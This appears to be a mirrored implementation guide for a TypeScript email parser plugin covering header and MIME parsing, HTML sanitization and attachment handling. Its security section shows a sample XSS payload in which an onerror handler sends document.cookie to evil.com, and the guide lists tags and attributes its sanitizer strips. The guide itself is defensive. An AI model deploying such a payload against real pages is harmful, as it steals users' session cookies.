mirror of https://github.com/johndoe6345789/metabuilder.git synced 2026-04-25 14:25:02 +00:00


Email Parser Plugin - Implementation Guide

Phase 6 of the email client architecture: RFC 5322 compliant email parsing with comprehensive MIME support.

Architecture Overview

The email parser is a workflow node executor that transforms raw RFC 5322 email messages into structured data compatible with the DBAL EmailMessage and EmailAttachment entities.

Flow

Raw IMAP Message (RFC 5322)
    ↓
[Email Parser Plugin]
    ├─ Parse Headers (RFC 5322)
    ├─ Parse MIME Structure (RFC 2045-2049)
    ├─ Extract Bodies (text/plain, text/html)
    ├─ Extract Attachments
    └─ Sanitize HTML (XSS Protection)
    ↓
Structured EmailMessage
    ├─ messageId, from, to, cc, bcc, replyTo
    ├─ subject, textBody, htmlBody
    ├─ headers (all key-value pairs)
    └─ attachments[] with metadata
    ↓
[DBAL Write Node]
    ├─ Store EmailMessage entity
    └─ Store EmailAttachment entities (one per file)

Implementation Details

1. Header Parsing (RFC 5322)

The parser implements RFC 5322 header field syntax:

header-field = field-name ":" field-body
field-name = 1*ftext
field-body = field-value [CRLF WSP field-value]  ; header folding

Key Features:

Case-insensitive header names
Support for folding (continuation lines)
Multiple values for same header (e.g., Received, X-Custom)
RFC 2047 encoded-word decoding for non-ASCII

Implementation:

private _parseHeaders(headersSection: string): Map<string, string | string[]>

Process:

Split by CRLF or LF
Check each line for continuation (starts with space/tab)
Store in case-insensitive Map
Handle duplicate headers as arrays
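
The four steps above can be sketched roughly as follows. This is a minimal illustration, not the plugin's actual `_parseHeaders`: the standalone function name `parseHeaders` and the `HeaderValue` alias are assumptions, folded lines are joined with a single space (a simplification of RFC 5322 unfolding), and RFC 2047 decoding is left out.

```typescript
// Hypothetical standalone sketch; the plugin's private _parseHeaders may differ.
type HeaderValue = string | string[];

function parseHeaders(headersSection: string): Map<string, HeaderValue> {
  const headers = new Map<string, HeaderValue>();
  const unfolded: string[] = [];

  // Steps 1-2: split on CRLF or LF, then join continuation lines
  // (lines starting with space/tab) onto the header line before them.
  let current = "";
  for (const line of headersSection.split(/\r?\n/)) {
    if (/^[ \t]/.test(line) && current !== "") {
      current += " " + line.trim();
    } else {
      if (current !== "") unfolded.push(current);
      current = line;
    }
  }
  if (current !== "") unfolded.push(current);

  // Steps 3-4: lowercase names for case-insensitive lookup and
  // collect repeated headers (e.g. Received) into arrays.
  for (const line of unfolded) {
    const colon = line.indexOf(":");
    if (colon <= 0) continue; // not a valid header field, skip it
    const name = line.slice(0, colon).trim().toLowerCase();
    const value = line.slice(colon + 1).trim();
    const existing = headers.get(name);
    if (existing === undefined) {
      headers.set(name, value);
    } else if (Array.isArray(existing)) {
      existing.push(value);
    } else {
      headers.set(name, [existing, value]);
    }
  }
  return headers;
}
```

Lowercasing the key on insert keeps lookups simple (`headers.get("subject")`), at the cost of losing the original header casing.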

2. MIME Structure Parsing (RFC 2045-2049)

Multipart messages have recursive structure:

multipart/alternative
├─ text/plain (simple part)
├─ text/html (simple part)
└─ multipart/mixed
   ├─ text/plain
   └─ application/pdf (attachment)

Key Features:

Detect multipart messages via Content-Type: multipart/*
Extract boundary from Content-Type parameter
Split body by boundary delimiters (--boundary)
Parse each part recursively
Support nested multipart structures

Implementation:

private _parseMimePart(
  body: string,
  contentType: string,
  contentEncoding: string
): MimePart

Process:

Check if message is multipart
Extract boundary from Content-Type
Split body by boundary
For each part, recursively call _parseMimePart
Build tree structure
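
As an illustration of the boundary steps, the sketch below extracts the boundary parameter and splits a multipart body into raw parts. The helper names `extractBoundary` and `splitByBoundary` are hypothetical and do not come from the plugin. Each returned part still contains its own headers and body, which a recursive parser would then process.

```typescript
// Hypothetical helpers; names are illustrative, not the plugin's API.
function extractBoundary(contentType: string): string | undefined {
  // The boundary may be quoted or bare: boundary="abc" or boundary=abc
  const match = /boundary\s*=\s*(?:"([^"]+)"|([^;\s]+))/i.exec(contentType);
  if (!match) return undefined;
  return match[1] !== undefined ? match[1] : match[2];
}

function splitByBoundary(body: string, boundary: string): string[] {
  const delimiter = "--" + boundary;
  const parts: string[] = [];
  // null until the first delimiter is seen, so the preamble is ignored
  let current: string[] | null = null;

  for (const line of body.split(/\r?\n/)) {
    const trimmed = line.replace(/[ \t]+$/, "");
    if (trimmed === delimiter + "--") {
      // Closing delimiter: flush the last part and ignore the epilogue.
      if (current !== null) parts.push(current.join("\r\n"));
      current = null;
      break;
    }
    if (trimmed === delimiter) {
      // Start of a new part: flush the previous one, if any.
      if (current !== null) parts.push(current.join("\r\n"));
      current = [];
      continue;
    }
    if (current !== null) current.push(line);
  }
  // Tolerate a missing closing delimiter by keeping what was collected.
  if (current !== null) parts.push(current.join("\r\n"));
  return parts;
}
```

Matching whole lines against the delimiter, rather than searching for the boundary string anywhere in the body, avoids splitting on text that merely contains the boundary value.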

3. Body Extraction

Extract text and HTML bodies from MIME tree:

Strategy for multipart/alternative:

Prefer text/html if available
Fall back to text/plain if HTML not present
Skip both if neither found

Strategy for multipart/mixed:

First text/plain → textBody
First text/html → htmlBody
Other parts → attachments

Implementation:

private _extractBodies(
  mimePart: MimePart,
  sanitizeHtml: boolean,
  maxLength: number
): { textBody?: string; htmlBody?: string; sanitizationWarnings: number }
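
A depth-first walk is one way to realize the "first text/plain, first text/html" strategy. The sketch below assumes a minimal `MimePart` shape, since the plugin's real type is not shown in this guide, and it omits sanitization and warning counting to stay short.

```typescript
// Hypothetical minimal shape; the plugin's real MimePart type is not shown here.
interface MimePart {
  contentType: string;   // e.g. "text/plain", "multipart/mixed"
  content?: string;      // decoded content for leaf parts
  disposition?: string;  // "inline" or "attachment", when present
  parts?: MimePart[];    // children of multipart/* nodes
}

interface Bodies {
  textBody?: string;
  htmlBody?: string;
}

function extractBodies(part: MimePart, maxLength: number, found: Bodies = {}): Bodies {
  const type = part.contentType.toLowerCase();
  if (type.startsWith("multipart/")) {
    // Recurse into children in document order.
    for (const child of part.parts ?? []) {
      extractBodies(child, maxLength, found);
    }
    return found;
  }
  // Explicit attachments and empty leaves never become a body.
  if (part.disposition === "attachment" || part.content === undefined) return found;
  // Depth-first order means the first matching leaf wins.
  if (type === "text/plain" && found.textBody === undefined) {
    found.textBody = part.content.slice(0, maxLength);
  } else if (type === "text/html" && found.htmlBody === undefined) {
    found.htmlBody = part.content.slice(0, maxLength);
  }
  return found;
}
```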

4. Content Encoding

Handle multiple content transfer encodings:

| Encoding | Handling |
| --- | --- |
| `base64` | Decode using Buffer.from() |
| `quoted-printable` | Decode soft line breaks (=\r\n) and escape sequences (=XX) |
| `7bit`, `8bit`, `binary` | No transformation needed |

Implementation:

private _decodeContent(content: string, encoding: string): string
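
A minimal sketch of these decoding rules is shown below, written as a standalone `decodeContent` function rather than the plugin's private method. It assumes the decoded bytes are UTF-8; a fuller implementation would presumably honour the charset parameter from Content-Type. The `decodeQuotedPrintable` helper is hypothetical.

```typescript
import { Buffer } from "node:buffer";

// Hypothetical helper: decodes quoted-printable text into raw bytes.
function decodeQuotedPrintable(input: string): Buffer {
  // Soft line breaks ("=" at end of line) are removed entirely.
  const text = input.replace(/=\r?\n/g, "");
  const bytes: number[] = [];
  for (let i = 0; i < text.length; i++) {
    const hex = text.slice(i + 1, i + 3);
    if (text[i] === "=" && /^[0-9A-Fa-f]{2}$/.test(hex)) {
      bytes.push(parseInt(hex, 16)); // =XX escape sequence
      i += 2;
    } else {
      bytes.push(text.charCodeAt(i) & 0xff); // literal character
    }
  }
  return Buffer.from(bytes);
}

// Assumption: decoded bytes are interpreted as UTF-8.
function decodeContent(content: string, encoding: string): string {
  switch (encoding.trim().toLowerCase()) {
    case "base64":
      // Line breaks inside base64 bodies are not part of the data.
      return Buffer.from(content.replace(/\s+/g, ""), "base64").toString("utf8");
    case "quoted-printable":
      return decodeQuotedPrintable(content).toString("utf8");
    default:
      return content; // 7bit, 8bit, binary: no transformation
  }
}
```

Decoding quoted-printable to bytes first, and only then to a string, matters for multi-byte characters such as `=C3=A9`, which must be combined before charset decoding.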

5. HTML Sanitization

Remove XSS vectors while preserving content:

Dangerous Tags Removed:

Script and style injection: <script>, <style>
Embedding: <iframe>, <object>, <embed>, <applet>
Forms: <form>, <input>, <button>, <select>
SVG/Math: <svg>, <math>

Dangerous Attributes Removed:

Event handlers: onclick, onerror, onload, onchange, etc.
URLs with javascript: href="javascript:...", src="javascript:..."
Form submission targets: formaction, action

Implementation:

private _sanitizeHtml(html: string): { html: string; warnings: number }

Process:

Remove script tags and content: <script>.*?</script>
Remove iframe tags: <iframe>.*?</iframe>
Remove style tags: <style>.*?</style>
Strip event handler attributes (onclick, onerror, etc.) from all remaining tags
Remove javascript: URLs from href and src attributes

Safety Notes:

Does NOT parse HTML into DOM (text-based replacement)
Does NOT load external resources
Does NOT validate tag nesting
Conservative: Removes suspicious content
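
To make the text-based approach concrete, here is a rough sketch of a regex-only sanitizer in the same spirit. It is not the plugin's `_sanitizeHtml`: the patterns are assumptions, and for brevity it strips `javascript:` URLs from `action`/`formaction` rather than removing those attributes outright. Regex sanitization of this kind can be bypassed by malformed markup, so treat it as an illustration of the steps rather than a hardened filter.

```typescript
// Illustrative only: patterns are assumptions, not the plugin's actual rules.
function sanitizeHtml(html: string): { html: string; warnings: number } {
  let warnings = 0;
  // Remove every match of a pattern and count each removal as a warning.
  const strip = (input: string, pattern: RegExp): string =>
    input.replace(pattern, () => {
      warnings++;
      return "";
    });

  let out = html;
  // 1. Remove container elements together with their content.
  //    [\s\S] is used so the match can span multiple lines.
  for (const tag of ["script", "style", "iframe", "object", "applet", "svg", "math"]) {
    out = strip(out, new RegExp(`<${tag}\\b[\\s\\S]*?<\\/${tag}\\s*>`, "gi"));
  }
  // 2. Remove any remaining dangerous opening/closing tags, keeping inner text.
  out = strip(
    out,
    /<\/?(?:script|style|iframe|object|embed|applet|svg|math|form|input|button|select)\b[^>]*>/gi
  );
  // 3. Remove on* event handler attributes.
  //    Limitation: this can also match "on...=" sequences in plain text.
  out = strip(out, /\s+on[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi);
  // 4. Remove attributes whose value is a javascript: URL.
  out = strip(
    out,
    /\s+(?:href|src|action|formaction)\s*=\s*(?:"\s*javascript:[^"]*"|'\s*javascript:[^']*'|javascript:[^\s>]*)/gi
  );
  return { html: out, warnings };
}
```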

6. Attachment Extraction

Identify and catalog attachments:

Criteria for Attachment:

MIME part exists in multipart/mixed
Not in list of inline types (text/plain, text/html)
Has Content-Disposition header
Filename can be extracted from filename parameter

Metadata Collected:

filename: From Content-Disposition or Content-Type name parameter
mimeType: Extracted from Content-Type
size: Length of encoded content
contentId: For embedded resources (Content-ID header)
isInline: From Content-Disposition inline vs attachment
contentEncoding: Transfer encoding used
content: Optional base64-encoded content, included only when content extraction is enabled and the attachment is smaller than 10MB

Implementation:

private _extractAttachments(
  mimePart: MimePart,
  extractContent: boolean,
  maxSize: number
): { attachments: EmailAttachmentMetadata[]; ... }
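
The criteria and metadata above depend mostly on reading the Content-Disposition header. The sketch below shows one possible way to do that; `parseContentDisposition` and `isAttachmentPart` are hypothetical helper names, and RFC 2231 extended parameters (`filename*=`) are deliberately not handled.

```typescript
// Hypothetical helpers illustrating the attachment criteria listed above.
interface DispositionInfo {
  isInline: boolean;
  filename: string | undefined;
}

function parseContentDisposition(header: string): DispositionInfo {
  // The disposition type is the token before the first ";".
  const [kind = ""] = header.split(";");
  // The filename parameter may be quoted or bare.
  const match = /filename\s*=\s*(?:"([^"]*)"|([^;\s]+))/i.exec(header);
  const filename = match ? (match[1] !== undefined ? match[1] : match[2]) : undefined;
  return { isInline: kind.trim().toLowerCase() === "inline", filename };
}

const INLINE_BODY_TYPES = ["text/plain", "text/html"];

// A part counts as an attachment when it carries a Content-Disposition
// header and is not one of the inline body types.
function isAttachmentPart(mimeType: string, disposition: string | undefined): boolean {
  if (disposition === undefined) return false;
  return INLINE_BODY_TYPES.indexOf(mimeType.toLowerCase()) === -1;
}
```

When no filename is found here, the Content-Type `name` parameter mentioned above would be the next place to look.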

Testing Strategy

Unit Tests

RFC 5322 Parsing
- Simple headers
- Multiple To addresses
- Display names in addresses
- Header folding with continuation lines
- Optional headers (CC, BCC, Reply-To)
MIME Multipart
- multipart/alternative (text + html)
- multipart/mixed (body + attachments)
- Nested multipart structures
- Boundary handling edge cases
Content Encoding
- Base64 decoding
- Quoted-printable decoding
- 7bit, 8bit, binary pass-through
HTML Sanitization
- Script tag removal
- Event handler removal
- iframe removal
- Safe HTML preservation
Attachment Extraction
- Attachment cataloging
- Inline vs attachment detection
- Size limit enforcement
- Content extraction control
Error Handling
- Missing From header
- Missing To header
- Invalid MIME structure
- Parsing recovery
Real-World Scenarios
- Complete realistic emails
- Multiple attachments
- Complex nesting
- Unicode headers (RFC 2047)

Coverage Goals

Line coverage: 80%+
Branch coverage: 80%+
All error paths tested
Edge cases (empty headers, no body, etc.)

Integration Points

With IMAP Sync Plugin

IMAP Sync fetches raw message from IMAP server:

// IMAP returns raw RFC 5322 message
const rawMessage = await imapClient.fetchMessage(messageId, 'BODY[]');

// Parser receives it
const config: EmailParserConfig = {
  rawMessage,      // ← Raw RFC 5322 format
  tenantId: user.tenantId
};

With DBAL Storage

Parser output matches DBAL entity schema:

// Parser output
const message: ParsedEmailMessage = {
  messageId: "<123@example.com>",
  from: "alice@example.com",
  to: ["bob@example.com"],
  subject: "Meeting",
  textBody: "Let's meet at 2pm",
  htmlBody: "<p>Let's meet at 2pm</p>",
  attachments: [
    { filename: "agenda.pdf", mimeType: "application/pdf", ... }
  ]
};

// DBAL entity
const emailMessage: EmailMessage = {
  tenantId: user.tenantId,
  emailClientId: account.id,
  folderId: folder.id,
  messageId: message.messageId,
  from: message.from,
  to: JSON.stringify(message.to),  // JSON stored in DB
  subject: message.subject,
  textBody: message.textBody,
  htmlBody: message.htmlBody,
  headers: JSON.stringify(message.headers),
  receivedAt: new Date(message.receivedAt).getTime(),
  attachmentCount: message.attachments.length
};

// Attachments stored separately
for (const attachment of message.attachments) {
  const emailAttachment: EmailAttachment = {
    tenantId: user.tenantId,
    messageId: emailMessage.id,
    filename: attachment.filename,
    mimeType: attachment.mimeType,
    size: attachment.size,
    contentId: attachment.contentId,
    isInline: attachment.isInline,
    storageKey: `attachments/${emailMessage.id}/${attachment.filename}`,
    downloadUrl: generatePresignedUrl(...)
  };
}

Performance Considerations

Memory

Loads entire message into memory
Large messages (>100MB) may cause issues
Attachment content not extracted by default (metadata only)
For large attachments: Keep extractAttachmentContent set to false

Parsing Speed

Typical times:

Simple text: <1ms
Text + HTML: 2-5ms
With attachment: 5-10ms
Large HTML (5MB): 50-100ms

Optimization

Disable HTML sanitization if not needed (rare):

sanitizeHtml: false  // Faster, but less safe

Don't extract large attachment content:

extractAttachmentContent: false  // Metadata only

Limit body length:
```
maxBodyLength: 1024 * 1024  // 1MB cap
```

Set reasonable attachment limits:

maxAttachmentSize: 25 * 1024 * 1024  // Skip > 25MB
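
Taken together, these options could be combined into a single conservative configuration. The interface below is a hypothetical shape assembled from the option names used in this guide, and the helper `withConservativeDefaults` is illustrative. The numeric defaults simply reuse the example values above and are assumptions, not documented defaults.

```typescript
// Hypothetical shape assembled from option names in this guide.
interface EmailParserConfig {
  rawMessage: string;
  tenantId: string;
  sanitizeHtml?: boolean;
  extractAttachmentContent?: boolean;
  maxBodyLength?: number;
  maxAttachmentSize?: number;
}

const MB = 1024 * 1024;

// Fill in conservative values for any option the caller left unset.
function withConservativeDefaults(config: EmailParserConfig): Required<EmailParserConfig> {
  return {
    rawMessage: config.rawMessage,
    tenantId: config.tenantId,
    sanitizeHtml: config.sanitizeHtml ?? true,                          // keep XSS protection on
    extractAttachmentContent: config.extractAttachmentContent ?? false, // metadata only
    maxBodyLength: config.maxBodyLength ?? 1 * MB,                      // assumed 1MB cap
    maxAttachmentSize: config.maxAttachmentSize ?? 25 * MB,             // assumed 25MB cap
  };
}
```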

Security Considerations

XSS Prevention

The parser sanitizes all HTML to prevent stored XSS:

// Input (dangerous)
<img src="x" onerror="fetch('http://evil.com/steal?data=' + document.cookie)">

// Output (safe)
<img src="x">  // onerror removed

No Code Execution

The parser:

Does NOT execute JavaScript
Does NOT make HTTP requests
Does NOT access filesystem
Does NOT run arbitrary code

Multi-Tenant Safety

All parser operations include tenantId:

Used in workflow context
Passed to DBAL storage
Enforces row-level access control

No External Dependencies

The parser uses only Node.js built-in APIs:

Buffer for encoding/decoding
Regular expressions for parsing
No external npm packages

Error Recovery

Graceful Degradation

When non-critical errors occur:

{
  status: 'partial',
  message: ParsedEmailMessage,    // ← Still produced
  errors: [                        // ← Non-fatal errors listed
    { code: 'INVALID_MIME', message: '...', recoverable: true }
  ]
}

Recoverable vs Non-Recoverable

Non-Recoverable (no message output):

Missing From header
Missing To header
Total parse exception

Recoverable (message still output):

Malformed MIME structure
Invalid encoding in attachment
Header parsing issues
HTML sanitization warnings
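
One way to express the recoverable versus non-recoverable split in code is sketched below. Only the `'partial'` status and the `INVALID_MIME` code appear in this guide; the `'success'` and `'error'` status values, the `MISSING_HEADER` code, and both function names are assumptions made for illustration.

```typescript
interface ParseError {
  code: string;
  message: string;
  recoverable: boolean;
}

// Assumption: only 'partial' is documented; the other two values are illustrative.
type ParseStatus = "success" | "partial" | "error";

// Missing From or To is non-recoverable, so no message should be produced.
function checkRequiredHeaders(headers: Map<string, unknown>): ParseError[] {
  const errors: ParseError[] = [];
  for (const name of ["from", "to"]) {
    if (!headers.has(name)) {
      errors.push({
        code: "MISSING_HEADER", // hypothetical error code
        message: `Missing required header: ${name}`,
        recoverable: false,
      });
    }
  }
  return errors;
}

// Any non-recoverable error fails the parse; otherwise errors downgrade to 'partial'.
function classifyResult(errors: ParseError[]): ParseStatus {
  if (errors.some((e) => !e.recoverable)) return "error";
  return errors.length > 0 ? "partial" : "success";
}
```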

Future Enhancements

Streaming Support
- Process large messages in chunks
- Reduce memory footprint
Async Content Extraction
- Store attachments to S3 during parsing
- Return only metadata
S/MIME and PGP
- Decrypt encrypted content
- Verify signatures
- Extract certificates
Better Charset Handling
- Detect charset from content
- Handle more encodings
Header Validation
- DKIM signature verification
- SPF/DMARC checking
Conversation Threading
- Group related messages
- Extract references (In-Reply-To, References)

Debugging

Enable Detailed Logging

In workflow execution context:

const result = await emailParserExecutor.execute(node, context, state);

// Check metrics
console.log('Parse time:', result.output.metrics.parseDurationMs);
console.log('Headers:', result.output.metrics.headerCount);
console.log('Parts:', result.output.metrics.partCount);
console.log('Attachments:', result.output.metrics.attachmentCount);

// Check warnings
if (result.output.warnings.length > 0) {
  console.warn('Warnings:', result.output.warnings);
}

// Check errors
if (result.output.errors.length > 0) {
  console.error('Errors:', result.output.errors);
}

Common Issues

Empty body after parsing
- Check if message has body at all
- Verify Content-Type multipart handling
- Check character encoding
Attachments not found
- Verify multipart/mixed structure
- Check Content-Disposition header
- Verify maxAttachmentSize limit
HTML missing after sanitization
- Check if HTML was actually present
- Review sanitization warnings count
- The sanitizer may have removed all content if it was flagged as dangerous
Special characters garbled
- Check RFC 2047 encoding in header
- Verify charset parameter in Content-Type
- Check the Buffer encoding used during base64 decode
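
When debugging garbled header text, it can help to decode RFC 2047 encoded-words by hand and compare the result with the parser output. The sketch below is a hypothetical standalone helper, `decodeEncodedWords`, that supports only the UTF-8, US-ASCII and ISO-8859-1 charsets; words in any other charset are left untouched.

```typescript
import { Buffer } from "node:buffer";

// Hypothetical debugging helper; supports a small set of charsets only.
function decodeEncodedWords(value: string): string {
  // Whitespace between adjacent encoded-words is not part of the text.
  const joined = value.replace(/\?=\s+=\?/g, "?==?");
  return joined.replace(
    /=\?([^?]+)\?([bBqQ])\?([^?]*)\?=/g,
    (whole: string, charset: string, enc: string, text: string): string => {
      const cs = charset.toLowerCase();
      if (cs !== "utf-8" && cs !== "us-ascii" && cs !== "iso-8859-1") return whole;
      let bytes: Buffer;
      if (enc.toLowerCase() === "b") {
        bytes = Buffer.from(text, "base64");
      } else {
        // Q encoding: "_" stands for a space and "=XX" is a hex-encoded byte.
        const raw: number[] = [];
        const t = text.replace(/_/g, " ");
        for (let i = 0; i < t.length; i++) {
          const hex = t.slice(i + 1, i + 3);
          if (t[i] === "=" && /^[0-9A-Fa-f]{2}$/.test(hex)) {
            raw.push(parseInt(hex, 16));
            i += 2;
          } else {
            raw.push(t.charCodeAt(i) & 0xff);
          }
        }
        bytes = Buffer.from(raw);
      }
      return bytes.toString(cs === "iso-8859-1" ? "latin1" : "utf8");
    }
  );
}
```

If the hand-decoded value is correct but the stored value is not, the problem is more likely in charset handling than in the encoded-word syntax itself.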

Contributing

To extend the parser:

Add new MIME type support in _extractBodies()
Add new sanitization rules in _sanitizeHtml()
Add encoding support in _decodeContent()
Add tests in index.test.ts
Update README.md with new features

References

RFC 5322 - Internet Message Format
RFC 2045-2049 - MIME (Multipurpose Internet Mail Extensions)
RFC 2047 - MIME Header Extensions for Non-ASCII Text
RFC 3501 - IMAP4rev1 (Mailbox Integration)
RFC 2183 - Content-Disposition Header Field
RFC 2387 - The MIME Multipart/Related Content-Type
